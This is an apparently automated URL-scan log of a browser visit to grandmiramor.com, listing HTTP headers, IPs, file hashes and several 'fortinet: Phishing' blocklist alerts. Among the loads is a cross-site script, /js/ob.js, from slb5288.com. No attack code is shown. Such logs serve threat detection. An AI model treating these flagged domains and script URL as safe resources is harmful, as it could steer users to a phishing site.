alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5070
Md5:    0856fdb55f19f03a1bec38b3d6e0ac77
Sha1:   89accd230fba95fe0049678070817b36ead015fa
Sha256: 17c6e6f9bb8f4261fff2dc2a43ed994986418761624b8afead768e89927594f2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F81517ad5-7c1b-49aa-9ba9-dbfa36fbb071.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 13882
x-amzn-requestid: 9022b0b3-31d5-4149-a969-02514f11b95a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvzNHjMoAMFWMg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9347-0e8354a02bef623644714e31;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:40:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ve4q5FDkwMGhPK6ZVVVCZtoBTaGaz43r_PwINzwS5Nx5tcZeQkVIfw==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:49:47 GMT
age: 62601
etag: "1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13882
Md5:    64d79191f005c9876b952c5f948aa0f7
Sha1:   1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a
Sha256: 00fb36c3d322e8302c5ce202d6d4119d637510cd6f3b63e1347781ec3bb9d7fc
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F50d7d834-f80d-4fd9-a728-24643ed00c45.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 6789
x-amzn-requestid: 4d94ce1b-d18f-43b8-bb4d-e7093f9bea42
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCvd2G9UIAMFrEg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637dc5f2-64a570135be59b83031811da;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 07:04:18 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: JygkDI7XSvlgurUTot874ZAXlOIqnv4cntMQ55IvHVqw93JBcksZjQ==
via: 1.1 4d7fa73f804f1c93f20cfc24c4b1266e.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:15:22 GMT
age: 28666
etag: "303c571b13b05fcf27ee1159d8fdf6369aaef0a2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6789
Md5:    d9d93b2a6875d446c3467eb49767eef5
Sha1:   303c571b13b05fcf27ee1159d8fdf6369aaef0a2
Sha256: 2a2345a925e0187979930a7f2de8548957ad9f2baae77364dcb157286e2b3fcf
                                        
GET / HTTP/1.1
Host: www.grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
156.240.38.111
HTTP/2 301 Moved Permanently
content-type: text/html; charset=UTF-8
server: nginx
date: Thu, 24 Nov 2022 15:13:08 GMT
location: https://grandmiramor.com/
x-powered-by: PHP/7.4.21
x-redirect-by: WordPress
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7462
Md5:    b4157f2c5c3c77ce699324ecb08f47c7
Sha1:   a7d9135f9d01ba13c3cdaf8b038c70212f159297
Sha256: 2305f7afee95bb34d9e8dbff571c6b146ba7b694be96e9e925c32d1f41785916

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:09 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:09 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 217
last-modified: Wed, 02 Nov 2022 08:36:11 GMT
etag: "63622bfb-d9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /vue.min.js HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 782
last-modified: Fri, 30 Sep 2022 07:09:38 GMT
etag: "63369632-30e"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   782
Md5:    29f2152f14b5c844d1b3ea97b80af53e
Sha1:   9430ba54802c8288c821c37ef92971b0642e9034
Sha256: b96b30cb262bed24d33bd1ff6c5470f8e2a12616495d8de12bae4e70fcf7d7f2

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/assets/js/skip-link-focus-fix.js?ver=20151215 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 685
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
etag: "6360d7e9-2ad"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   685
Md5:    93d421fd7576b0ca9c359ffe2fa16113
Sha1:   eacce35258f14fcd79bea2bc23f4140d25874322
Sha256: 14af47320898bd93f367026f7833c9956f14e24856976e4f9e10be31155cdcf2
                                        
GET /wp-content/uploads/2022/11/53abe96dly1h8fwde0v1lj20k00zk420-480x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 33059
last-modified: Thu, 24 Nov 2022 13:28:59 GMT
etag: "637f719b-8123"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 480x450, components 3\012- data
Size:   33059
Md5:    836fa30640d2c1b10f68a4d438380ea4
Sha1:   50436ad8dfe910c9c3b65d8333120897ad9f4632
Sha256: 1b615ea01ce8cc4435beff664330a906de2ece14552456d6801d42661dcd3fe8
                                        
GET /wp-content/uploads/2022/11/6272b9226477f_watermark-750x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 44384
last-modified: Thu, 24 Nov 2022 13:27:33 GMT
etag: "637f7145-ad60"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   44384
Md5:    6f2159e40ba10449f7516da923e51c24
Sha1:   10414c7c87c8f5f9b4123509d1c714d943d2a8a9
Sha256: 7e75542406eab344d8963bf4213d83197fd07a4298d52bf4ca29725443d050d7
                                        
GET /wp-content/uploads/2022/11/61e8f30edc3d6_watermark-750x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 63120
last-modified: Wed, 23 Nov 2022 13:23:28 GMT
etag: "637e1ed0-f690"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   63120
Md5:    836fc026a5514cde22c88508e5369646
Sha1:   55ea9376c1019eb43f0dbc24d84fd9f828d4f523
Sha256: fca7ada6ea7eeb1f10c0e62962284f534248405505bfa9949261b35cc31947ef
                                        
GET /wp-content/uploads/2022/11/62d9a7d1c52cd_watermark-750x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 38451
last-modified: Wed, 23 Nov 2022 13:22:04 GMT
etag: "637e1e7c-9633"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   38451
Md5:    b8079a34154725a41262998fd8d4a246
Sha1:   19ec6904eddd9c5e5ce4557215d8d4a4b178ce2e
Sha256: b52c518a9896a17db015edacec6b4d8e250b098da06ae022bd9b552cd33a7508
                                        
GET /wp-content/uploads/2022/11/20221121181923_3263-840x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 39841
last-modified: Tue, 22 Nov 2022 12:33:28 GMT
etag: "637cc198-9ba1"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   39841
Md5:    dfa0a4a95dc95056ca66215093791729
Sha1:   688da4a454109acaa373277eee3b0684777f6b32
Sha256: c6df93c13f4a46a1d5334c3e5070e6e230c57cfd6ccb9e708c698286b317e538
                                        
GET /wp-content/uploads/2022/11/707c-d3c610ae4773030da6a9034b0b5c5975-840x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 35784
last-modified: Tue, 22 Nov 2022 12:31:27 GMT
etag: "637cc11f-8bc8"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   35784
Md5:    078e0e1a13fad6abd3e1d30b02b61da4
Sha1:   a6866b672e041008b270be251f9555511d0f70f9
Sha256: d138f5bd799b8845ba9e201b260150d802e123ccf524858388a8011e2bb9c348
                                        
GET /wp-content/uploads/2022/11/006p7P3Mgy1h8bzrc0qlaj30u01hcamc-480x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 28011
last-modified: Mon, 21 Nov 2022 12:43:34 GMT
etag: "637b7276-6d6b"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 480x450, components 3\012- data
Size:   28011
Md5:    f826177d827057caf9e1c1594552d3a6
Sha1:   4a9db5c5483d8745d21a47c3eb451f398bff03a0
Sha256: 6e90f2b034bcd96c87c770757971882ad813158ce20c3fa4a0594f81240fa50b
                                        
GET /wp-content/uploads/2022/11/202211230140002891-840x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 68201
last-modified: Wed, 23 Nov 2022 13:20:33 GMT
etag: "637e1e21-10a69"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   68201
Md5:    2817af96cbbbe7ae5dd3288b7a06e694
Sha1:   de24c45b7d88c857a0545aa32ec912e38611405f
Sha256: 2a44ab8dc6acb5ea26622f184c33512232ed4301bf2eefa5f4f1cd51f4cfed1e
                                        
GET /wp-content/uploads/2022/11/4ed4-6a2e66e8b35f36a1ce4419e6d23c51f9-840x450.jpg HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 67107
last-modified: Tue, 22 Nov 2022 12:29:49 GMT
etag: "637cc0bd-10623"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   67107
Md5:    5cc2d2a0224af122831609c0c7ff547a
Sha1:   f8be0e13e558b40e31e1344a00bc9263eb2e2cfb
Sha256: 84c9bb1b38af1e3cbb24fd54613296b88702af6ec8a61793032f5878e74739f0
                                        
POST /gsrsaovsslca2018 HTTP/1.1
Host: ocsp.globalsign.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:10 GMT
Content-Length: 1432
Connection: keep-alive
Expires: Mon, 28 Nov 2022 11:27:51 GMT
ETag: "375a16462a65c893805d1390a634f1b8aa4a5d8f"
Last-Modified: Thu, 24 Nov 2022 11:27:52 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3337
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 76f316492d67b521-OSL


--- Additional Info ---
Magic:  data
Size:   1432
Md5:    8ec1f825b67924ee4c83e4af2617343e
Sha1:   375a16462a65c893805d1390a634f1b8aa4a5d8f
Sha256: 49b90cb3fd89e5560c96d8ad354e6f1b09243d80b249595cf1f7cb2461bdc8d8
                                        
POST /gsrsaovsslca2018 HTTP/1.1
Host: ocsp.globalsign.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:10 GMT
Content-Length: 1432
Connection: keep-alive
Expires: Mon, 28 Nov 2022 11:27:51 GMT
ETag: "375a16462a65c893805d1390a634f1b8aa4a5d8f"
Last-Modified: Thu, 24 Nov 2022 11:27:52 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3337
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 76f316492877fac8-OSL


--- Additional Info ---
Magic:  data
Size:   1432
Md5:    8ec1f825b67924ee4c83e4af2617343e
Sha1:   375a16462a65c893805d1390a634f1b8aa4a5d8f
Sha256: 49b90cb3fd89e5560c96d8ad354e6f1b09243d80b249595cf1f7cb2461bdc8d8
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "31C2DBFD1F0C2D7122602D2EA004DEFBF626D079DCCB54D8861EEBBEE849DB08"
Last-Modified: Thu, 24 Nov 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16546
Expires: Thu, 24 Nov 2022 19:48:56 GMT
Date: Thu, 24 Nov 2022 15:13:10 GMT
Connection: keep-alive

                                        
GET /js/ob.js HTTP/1.1
Host: www.slb5288.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
103.35.116.217
HTTP/1.1 200 OK
Content-Type: application/javascript
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Mon, 05 Sep 2022 20:07:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"63165717-611"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document, ASCII text, with CRLF line terminators
Size:   841
Md5:    18ee27042fd971542702f542c58d35ea
Sha1:   29f542404c0d956d3303661f927ab9e5be70b041
Sha256: f8632df9f9df81c826a3276d492c3210508dd947cfa5be2846dc2cd02f2a8f8b
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meGCQYbw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://grandmiramor.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
